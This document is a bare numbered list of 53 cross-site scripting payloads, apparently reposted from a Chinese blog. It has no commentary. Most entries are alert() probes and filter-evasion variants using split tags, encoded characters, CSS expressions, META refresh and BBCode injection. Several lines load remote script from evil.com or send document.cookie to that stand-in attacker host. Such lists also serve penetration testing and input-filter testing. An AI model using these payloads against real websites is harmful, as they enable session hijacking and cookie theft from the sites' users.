1.<script> alert(1);</script>
2.<script>alert(‘xss‘);</script>
3.<script src="http://www.evil.com/cookie.php"></script>
4.<script>location.href="http://www.evil.com/cookies.php?cookie="+escape(document.cookie)"</script>
5.<scr<script>ipt>alert(‘xss‘);</scr</script>ipt>
6.<img src=liu.jpg onerror=alert(/xss/)/>
7.<style>@im\port‘\ja\vasc\ript:alert(\"xss\")‘;</style>
8.<?echo(‘<src)‘; echo(‘ipt>alert(\"xss\")‘;</script>‘);?>
9.<marquee><script>alert(‘xss‘)</script></marquee>
10.<IMG SRC=\"jav�x9;ascript:alert(‘xss‘);\">
11.<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
12."><script>alert(1)</script>
13.<script src=http://www.evil.com/files.js></script>
14.</title><script>alert(/xss/)</script>
15.</textarea><script>alert(/xss)</script>
16.<IMG LOWSRC=\"javascript:alert(‘XSS‘)\">
17.<IMG DYNSRC=\"javascript:alert(‘XSS‘)\">
18.<font style=‘color:expression(alert(document.cookie))‘>
19.‘);alert(‘XSS
20.<img src="javascript:alert(‘XSS‘)">
21.[url=javascript:alert(‘XSS‘);]click me[/url]
22.<body onunload="javascript:alert(‘XSS‘);">
23.<body onLoad="alert(‘XSS‘);"
24.[color=red‘ onmouseover="alert(‘XSS‘)"]mouse over[/color]
25."/></a></><img src=1.gif onerror=alert(1)>
26.window.alert("XSS");
27.<div style="x:expression((window==1)?":eval(‘r=1;alert(String.fromCharCode(83,83,83));‘))">
28.<iframe<?php eval chr(11)?>onload=alert(‘XSS‘)></iframe>
29."><script alert(String.fromCharCode(88,83,83))</script>
30.‘>><marquee><h1>XSS<h1></marquee>
31.‘">><script>alert(‘xss‘)</script>
32.‘">><marquee><h1>XSS</h1></marquee>
33.<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(‘XSS‘);\">
34.<META HTTP-EQUIV=\"refresh\"CONTENT=\"0;URL=http://;url=javascript:alert(‘XSS‘);\">
35.<script>var var=1; alert(var)</script>
36.<STYLE type="text/css">BODY{background:url("javascript:alert(‘XSS‘)")}</STYLE>
37.<?=‘<SCRIPT>alert("XSS")</SCRIPT>‘?>
38.<IMG SRC=‘vbscript:msgbox(\"XSS\")‘>
39."onfocus=alert(document.domain)"><"
40.<FRAMESET><FRAME SRC=\"javascript:alert(‘XSS‘);\"></FRAMESET>
41.<STYLE>li {list-style-image:url(\"javascript:alert(‘XSS‘)\");}</STYLE><UL><LI>XSS
42.<br size=\"&{alert(‘xss‘)}\">
43.<scrscriptipt>alert(1)</scrscriptipt>
44."><BODY onload!#$%&()*~+-_.,:;[email protected][/|\]^`=alert("XSS")>
45.[color=red width=expression(alert(123))][color]
46.<BASE HREF="javascript:alert(‘XSS‘);//">
47.Execute(MsgBox(chr(88)&&chr(83)&&chr(83)))<
48."></iframe><script>alert(123)</script>
49.<body onLoad="while(true) alert(‘XSS‘);">
50."<marquee><img src=k.png onerror=alert(/xss/) />
51.<div style="background:url(‘javascript:‘)
52.<img src=‘java\nscript:alert(\"XSS\")‘>
53.>‘"><img src="javascript:alert(‘xss‘)">
原文地址:https://www.cnblogs.com/bl8ck/p/9610294.html